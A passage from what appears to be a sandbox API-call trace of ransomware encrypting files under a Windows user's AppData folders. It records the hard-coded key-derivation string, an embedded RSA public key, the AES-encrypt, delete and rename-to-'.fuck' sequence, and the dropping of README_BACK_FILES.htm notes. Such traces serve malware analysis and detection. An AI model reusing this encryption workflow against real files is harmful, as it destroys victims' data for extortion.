hKey=0x2e7f380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0266.165] CryptEncrypt (in: hKey=0x2e7f380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78278*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2e78278*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0266.165] WriteFile (in: hFile=0x5d44, lpBuffer=0x2e78278*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2e78278*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0266.166] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x205, lpOverlapped=0x0) returned 1 [0266.167] CryptEncrypt (in: hKey=0x2e7f6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x205, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x210) returned 1 [0266.167] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x210, lpOverlapped=0x0) returned 1 [0266.171] CloseHandle (hObject=0x5d48) returned 1 [0266.172] CloseHandle (hObject=0x5d44) returned 1 [0266.172] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\ngentask.exe.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\ngentask.exe.log"), bFailIfExists=0) returned 1 [0266.174] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log", dwFileAttributes=0x0) returned 1 [0266.175] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\ngentask.exe.log.gsg")) returned 1 [0266.176] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\ngentask.exe.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\NGenTask.exe.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\ngentask.exe.log.fuck")) returned 1 [0266.177] CryptDestroyHash (hHash=0x2e7ec80) returned 1 [0266.177] CryptDestroyKey (hKey=0x2e7f6c0) returned 1 [0266.177] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0266.177] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.177] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0266.177] GetLastError () returned 0x0 [0266.177] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\powershell.exe.log")) returned 0x20 [0266.177] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log", dwFileAttributes=0x80) returned 1 [0266.177] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\powershell.exe.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0266.178] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\powershell.exe.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0266.178] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log.gsg", dwFileAttributes=0x2) returned 1 [0266.179] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2e7a500) returned 1 [0266.180] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0266.180] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0266.181] CryptHashData (hHash=0x2e7f640, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0266.181] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7f640, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f3c0) returned 1 [0266.181] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0266.181] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0266.181] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2e789e8) returned 1 [0266.181] CryptImportPublicKeyInfo (in: hCryptProv=0x2e789e8, dwCertEncodingType=0x1, pInfo=0x2eb0d00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0d30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0d38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f7c0) returned 1 [0266.181] CryptEncrypt (in: hKey=0x2e7f7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0266.181] CryptEncrypt (in: hKey=0x2e7f7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78388*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2e78388*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0266.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x2e78388*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2e78388*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0266.182] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.250] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.250] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.251] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.252] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.252] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.252] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x311, lpOverlapped=0x0) returned 1 [0266.252] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x311, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x320) returned 1 [0266.252] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x320, lpOverlapped=0x0) returned 1 [0266.252] CloseHandle (hObject=0x5d44) returned 1 [0266.252] CloseHandle (hObject=0x5d48) returned 1 [0266.252] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\powershell.exe.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\powershell.exe.log"), bFailIfExists=0) returned 1 [0266.254] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log", dwFileAttributes=0x0) returned 1 [0266.255] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\powershell.exe.log.gsg")) returned 1 [0266.256] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\powershell.exe.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\powershell.exe.log.fuck")) returned 1 [0266.257] CryptDestroyHash (hHash=0x2e7f640) returned 1 [0266.257] CryptDestroyKey (hKey=0x2e7f3c0) returned 1 [0266.257] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0266.257] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0266.257] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0266.257] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\readme_back_files.htm")) returned 0xffffffff [0266.257] AreFileApisANSI () returned 1 [0266.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28892e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0266.257] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\usagelogs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0266.258] GetFileType (hFile=0x5d3c) returned 0x1 [0266.258] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0266.259] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0266.259] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0266.259] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\readme_back_files.htm")) returned 0xffffffff [0266.259] AreFileApisANSI () returned 1 [0266.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0266.259] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0_32\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0266.261] GetFileType (hFile=0x5d10) returned 0x1 [0266.261] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0266.262] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0266.262] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0266.262] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.262] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.262] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0266.262] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0266.262] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\credentials\\readme_back_files.htm")) returned 0xffffffff [0266.263] AreFileApisANSI () returned 1 [0266.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0266.263] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\credentials\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0266.264] GetFileType (hFile=0x5d10) returned 0x1 [0266.264] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0266.265] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0266.265] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0266.266] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.266] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0266.266] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0266.266] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Event Viewer\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\event viewer\\readme_back_files.htm")) returned 0xffffffff [0266.266] AreFileApisANSI () returned 1 [0266.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0266.266] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Event Viewer\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\event viewer\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0266.266] GetFileType (hFile=0x5d10) returned 0x1 [0266.266] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0266.267] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0266.267] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0266.268] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.268] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.268] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0266.268] GetLastError () returned 0x0 [0266.268] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms")) returned 0x20 [0266.269] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms", dwFileAttributes=0x80) returned 1 [0266.270] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0266.270] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0266.272] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.gsg", dwFileAttributes=0x2) returned 1 [0266.272] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2e7a500) returned 1 [0266.274] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0266.274] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0266.274] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0266.274] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2e7ec80) returned 1 [0266.274] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0266.274] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0266.274] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2e77fd0) returned 1 [0266.274] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77fd0, dwCertEncodingType=0x1, pInfo=0x2eb0ea0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0ed0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0ed8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2e7f5c0) returned 1 [0266.274] CryptEncrypt (in: hKey=0x2e7f5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0266.274] CryptEncrypt (in: hKey=0x2e7f5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78a70*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2e78a70*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0266.274] WriteFile (in: hFile=0x5d48, lpBuffer=0x2e78a70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2e78a70*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0266.275] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.301] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.301] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.313] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.313] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.313] WriteFile (in: 